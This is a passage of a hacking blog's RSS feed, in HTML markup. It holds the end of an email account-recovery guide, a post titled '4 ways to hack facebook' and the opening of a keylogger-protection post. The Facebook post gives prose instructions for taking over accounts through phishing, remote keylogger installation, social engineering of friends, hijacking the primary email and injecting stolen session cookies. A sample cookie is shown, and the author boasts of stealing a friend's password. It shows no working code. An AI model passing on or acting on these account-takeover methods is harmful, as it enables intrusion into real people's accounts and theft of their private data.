&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Names of any 4 Labels that you may have created in your account&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;List of other services associated with your compromised account&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Your last successful login date&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Account created date&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Last password that you remember and many more…&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
You need to fill out this form as much&amp;nbsp;accurately as&amp;nbsp;possible. It is obvious to forget the dates&amp;nbsp;of last login, account creation and similar terms. However, you need to figure out the closest possible date/answers and fill out&amp;nbsp;this form. This is&amp;nbsp;your last chance!&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
The more accurate the information filled out in the&amp;nbsp;recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div class="alertBox-info" style="background-attachment: scroll; background-color: #d1eefb; background-image: none; background-position: 0px 0px; border-radius: 4px; border: 0px; clear: both; color: #467b9e; line-height: 1.6em; margin: 0px 0px 35px; outline: 0px; padding: 0px; vertical-align: baseline; z-index: 968;"&gt;
&lt;div style="background-attachment: scroll; background-color: transparent; background-image: url(https://www.gohacking.com/wp-content/themes/GoHacking-2012/i/information.png); background-position: 20px 50%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 0px solid; clear: both; margin: 0px 0px 0pt; outline: 0px; padding: 10px 10px 10px 55px; vertical-align: baseline; z-index: 967;"&gt;
&lt;a href="http://www.google.com/support/accounts/bin/request.py?ara=1" rel="nofollow" style="-webkit-transition: all 0.2s; background-attachment: scroll; background-color: transparent; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; color: #0060a6; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank"&gt;&lt;span style="font-size: small;"&gt;Account Recovery Form&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;h3 style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; font-family: &amp;quot;open sans&amp;quot;, arial, sans-serif; margin: 0px 0px 0.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-size: small;"&gt;
For Yahoo and&amp;nbsp;Hotmail:&lt;/span&gt;&lt;/h3&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Unfortunately, for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions&amp;nbsp;that you have setup or reset the password using the secondary email option.&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
To initiate the password reset process just click on the&amp;nbsp;&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;em style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Forgot password link&lt;/em&gt;&lt;/strong&gt;&amp;nbsp;in your&amp;nbsp;login page and proceed as per the screen instructions.&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
I hope this post will help you recover the lost account. I highly recommend that you also read my post on&amp;nbsp;&lt;a href="http://www.gohacking.com/protect-email-other-online-accounts-from-hackers/" style="-webkit-transition: all 0.2s; background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; color: #0060a6; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"&gt;How to protect your email account&lt;/a&gt;&amp;nbsp;from being hacked and&amp;nbsp;&lt;a href="http://www.gohacking.com/find-unauthorized-activity-on-email-account/" style="-webkit-transition: all 0.2s; background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; color: #0060a6; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"&gt;Tips to find unauthorized activity on your Gmail account&lt;/a&gt;&amp;nbsp;so that you always stay protected&lt;br /&gt;
!&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigd7AUaYygJTiZ-lR20SQ3XxyCeTGi77xrDWWNuWz7F3_yDhzWpkFlmP79jaDefScppZ_vv9t_fTEpw2Mf5FINDAfQFP9zQh9AWNT93LYCjtj4FUTYOE_byymDfkCPINvFpCRfS0GCZ4g/s72-c/email-security-concept-700px.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>4 ways to hack facebook</title><link>https://snacksofhacks.blogspot.com/2013/01/4-ways-to-hack-facebook.html</link><category>HaCkinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 17:18:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-5609997793170023551</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #333333; font-family: Verdana, sans-serif; font-size: x-large;"&gt;&lt;span style="background-color: white; line-height: 19.1875px;"&gt;Hacking facebook&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; line-height: 19.1875px;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; line-height: 19.1875px;"&gt;&lt;span style="font-size: x-large;"&gt;I&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;n my previous post&amp;nbsp;&lt;/span&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/07/how-to-hack-facebook-account.html" style="border: none; color: #666666; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-decoration: none;" title="How to hack facebook"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;How to hack facebook password&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;i told you about hacking facebook with phishing,Today i thought to uncover all the methods used to hack facebook password,&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;I will cover 4 methods over here:&lt;/span&gt;&lt;/h3&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;1.&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/07/how-to-hack-facebook-account.html" style="border: none; color: #666666; text-decoration: none;" title="How to hack facebook"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Facebook Phishing&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;2.&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2010/01/remote-password-hacking-software_07.html" style="border: none; color: #666666; text-decoration: none;"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Keylogging&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;3.&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Social engineering&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;4&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;. Primary email address hack&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;a href="http://www.blogger.com/blogger.g?blogID=3441350317927969357" name="more" style="color: #a46f38; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/a&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;1.Facebook phishing:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ8BRFInKTFs9EL9PZhrU4uV79q5nhX6pVSkYv0-DLmFjZ6_ZsgKMPujjdXaS5e6XGrib-vB40MmXDqqSl78RSWrGIU74Fir07fXkZ4QmjObwbtAoUvzbZnmxprsZmD_pEWVFJxv_r7Pg/s1600/images.jpeg" imageanchor="1" style="background-color: white; border: none; color: #666666; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ8BRFInKTFs9EL9PZhrU4uV79q5nhX6pVSkYv0-DLmFjZ6_ZsgKMPujjdXaS5e6XGrib-vB40MmXDqqSl78RSWrGIU74Fir07fXkZ4QmjObwbtAoUvzbZnmxprsZmD_pEWVFJxv_r7Pg/s1600/images.jpeg" style="border-width: 0px; padding: 10px;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/07/how-to-hack-facebook-account.html" style="border: none; color: #666666; text-decoration: none;"&gt;How to hack facebook password&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;2.Keylogging:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqkUBKUORAAJhPEH2uRBD3EnH711F-RZ-Hzx_m3Hn9ZiNW21Lkq3KuRYz7trB8P_awMY3suohX7Kvd__jrKL_9wfsBf8xVGfa9fURoJGGtcPVuoWccvWeZQVAVNHu5T7qwocB8Jsdtsu0/s1600/spyware.jpeg" imageanchor="1" style="border: none; clear: left; color: #666666; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;span style="background-color: white;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqkUBKUORAAJhPEH2uRBD3EnH711F-RZ-Hzx_m3Hn9ZiNW21Lkq3KuRYz7trB8P_awMY3suohX7Kvd__jrKL_9wfsBf8xVGfa9fURoJGGtcPVuoWccvWeZQVAVNHu5T7qwocB8Jsdtsu0/s1600/spyware.jpeg" style="border-width: 0px; padding: 10px;" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password. I have posted detailed information of top keyloggers in the trade for more information see my&amp;nbsp;&lt;/span&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/search/label/Password%20Hacking%20softwares" style="border: none; color: #666666; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-decoration: none;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;password hacking softwares&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;section&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;3. Social engineering:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;got his Facebook password&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: Verdana, sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;4.Primary email address hack&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div id="TixyyLink" style="border: medium none; font-family: Verdana; font-size: 12px; line-height: 19.1875px; overflow: hidden;"&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;If&amp;nbsp;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Facebook hacker&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this Facebook hacker can easily&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;hack your Facebook password&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&amp;nbsp;using "&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Forgot password&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;" trick. He will simply ask Facebook to send password reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will be hacked !!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email address&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div id="TixyyLink" style="border: medium none; color: #333333; font-family: Verdana; line-height: 19.1875px; overflow: hidden;"&gt;
&lt;div style="color: black; font-size: 12px;"&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;So far, i found these&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Facebook hacking methods&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&amp;nbsp;as best and working ways to&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;hack facebook account passwords&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;. I never encourage&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;hacking Facebook&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&amp;nbsp;or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: black; font-size: 12px;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: black; font-size: 12px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;b style="background-color: white;"&gt;5. Facebook Cookie Stealing&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: black; font-size: 12px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;b style="background-color: white;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: black; font-size: 12px;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif;"&gt;I am updating this post with a new method which is being used to hack facebook accounts, which I think is very effective, Facebook cookie stealing is becoming popular day by day.The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: black; font-size: 12px;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;blockquote style="border: 4px solid rgb(190, 189, 189); color: #666666; font-family: Helvetica, Arial; font-size: 12px; font-weight: bold; line-height: 1.3em; margin: 0px 20px; padding: 10px;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif;"&gt;Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="font-size: 12px; text-align: center;"&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-size: 12px; text-align: center;"&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b style="background-color: white;"&gt;Dear blog readers,hackers,script kiddies try the one which is hardest to you b'coz a harder hack will increase your skills...&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b style="background-color: white;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b style="background-color: white;"&gt;LIke ,comment and share help me in making the hacks like this...&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b style="background-color: white;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b style="background-color: white;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;b&gt;&lt;span style="background-color: white; font-size: large;"&gt;____----Our hack is yours----____&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ8BRFInKTFs9EL9PZhrU4uV79q5nhX6pVSkYv0-DLmFjZ6_ZsgKMPujjdXaS5e6XGrib-vB40MmXDqqSl78RSWrGIU74Fir07fXkZ4QmjObwbtAoUvzbZnmxprsZmD_pEWVFJxv_r7Pg/s72-c/images.jpeg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Protect Your Computer from Keyloggers</title><link>https://snacksofhacks.blogspot.com/2013/01/how-to-protect-your-computer-from.html</link><category>HaCkinG</category><category>MuSt C</category><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 16:56:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-4067287468433664549</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="entry" style="z-index: 971;"&gt;
&lt;div style="font-family: Arial, Verdana, sans-serif; line-height: 23.796875px; text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8UzCK0qsU-SQFxHYltnk0fj7yzaVv7uup8CgX21Sw3QK3BQaJsllYf3kVT0keW7gA43Cn0N_Gutk7OKOexrQ6l-CGFYA2n41wB9uvDasFgoMN-SISSC8IuL1J_T5gdjYzZF1YbJ26D_E/s1600/Ways-To-Protect-Yourself-Against-Keyloggers.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;span style="background-color: white;"&gt;&lt;img border="0" data-original-height="720" data-original-width="1280" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8UzCK0qsU-SQFxHYltnk0fj7yzaVv7uup8CgX21Sw3QK3BQaJsllYf3kVT0keW7gA43Cn0N_Gutk7OKOexrQ6l-CGFYA2n41wB9uvDasFgoMN-SISSC8IuL1J_T5gdjYzZF1YbJ26D_E/s320/Ways-To-Protect-Yourself-Against-Keyloggers.jpg" width="320" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
